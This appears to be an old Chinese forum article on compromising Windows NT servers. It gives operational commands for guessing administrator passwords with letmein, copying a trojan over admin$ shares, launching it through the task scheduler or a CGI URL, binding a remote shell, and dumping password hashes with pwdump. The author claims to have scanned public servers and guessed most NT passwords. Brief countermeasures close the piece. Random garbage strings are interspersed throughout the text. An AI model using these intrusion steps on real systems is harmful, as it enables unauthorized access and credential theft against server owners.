远程入侵NT ----spp(低音炮)

看了篇文章介绍使用netbus 或 netspy　远程入侵nt系统，感觉真是。。看来nt系统的共享机制如果不配合火墙使用，SMB会给你造成很大麻烦。。　连小小 只的木马都可以让nt管理员头大。
    其攻击过程如下：
1、使用扫描工具查找NT主机　　　　　　
& d, G0 ~7 e$ @! I1 R9 V! N2 k2 、确定攻击目标后，使用letmein 对目标主机进行攻击， 如：
% ]% q1 H7 Y$ U" }letmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击)
2 r8 s, {8 Z( t9 P( |letmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击)
% n$ I- w" g  d: B/ B& oletmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户)
; f# V3 ^4 k; L/ X! ~7 ~( ]注：- 确定目标后，收集目标信息并尝试取得非法资源
3、当letmein 获取相关管理员权限后，使用ms提供的合法命令：
net use \\x.x.x.x\ipc$ "pass"/user:"user" 连接远程资源并将木马拷入远程
copy x:\netserver.exe \\x.x.x.x\admin$\system32
4、使用合法ms命令远程启动木马服务：
4 l! J' f; L) Z/ f7 i. n* |netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg
  z; ?: p4 r- h% _6 R7 E, F
   该方法有其巧妙之处。。利用nt的任务计划管理，在特定时候启动木马服务

* ^0 l$ A( K. {5 I. O8 B3 E$ H   另一种方法：
   将ntsrver.exe 或其他运行程序Copy到目的服务器的www可执行目录， 如cgi-bin或scripts，然后在浏览器键入url如： http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木马服务将被启动

) j' W3 h$ Z/ }    到此，该次攻击可以算成功了，远程资源已在别人控制下。
8 ^; S* }( e. t! w$ j% [    如果在远程使用app redirect 启动一个cmd.exe到特定端口 , 那么你可以telnet 到该端口，更方便使用该远程资源 。比如：使用pwdump 将远程nt上所有用户和密码 dump成文件，回传本地，使用其他工具如l0phtcrack来运算。 分析该次攻击的整体过程，不难看出，关键步骤是letmein取得admin权限，但是很不幸，就目前厦门(有些是省内)的nt服务器管理员而言，密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果，除了solaris和linux系统之外，其余的nt被letmein猜中率有75%以上。而且在这些被进入的机器上，SMB都有在tcp/ip上 跑，有两台有配备火墙，但是没有封闭对外137-139口。
$ I1 T/ R. c1 \! D) K) O
7 z* U8 ~% R' Y0 i# b" K, M     对策：
# F. p( @& ]  d  i4 k- K  z- d１、还是老话，密码的选择问题，使用向..@2KjsfiM7v!09..这样的密码会让任何使用 暴力法计算的机器算到cpu烧掉。
6 q! U* P7 c( A9 H7 y4 G( V２、nt网络的适当配置，不要在对外的nc绑定共享服务是个好习惯，特别是tcp/ip协议。
2 U& r5 c  `2 \, x. B# \5 o4 l３、防火墙的配置，屏蔽一切不需要的服务端口，象netebui在tcp/ip上的137-139口，开这些口只会使你的系统处于危险的处境，如果非要在远程使用这些口的服务，建议使用其他软件来代替。
2 C% z: G- M' A４、及时检查日记和监控服务的运行，定时对文件系统的权限受托关系进行检查。
５、管理人员素质的提高，安全风险意思加强无疑对你管理的系统有很多好处。 -- SPP 10Hz的低频 你听不到的声音却无时不刻在影响着你 。
$ ?7 [& R( i! j6 G8 \) z* `. V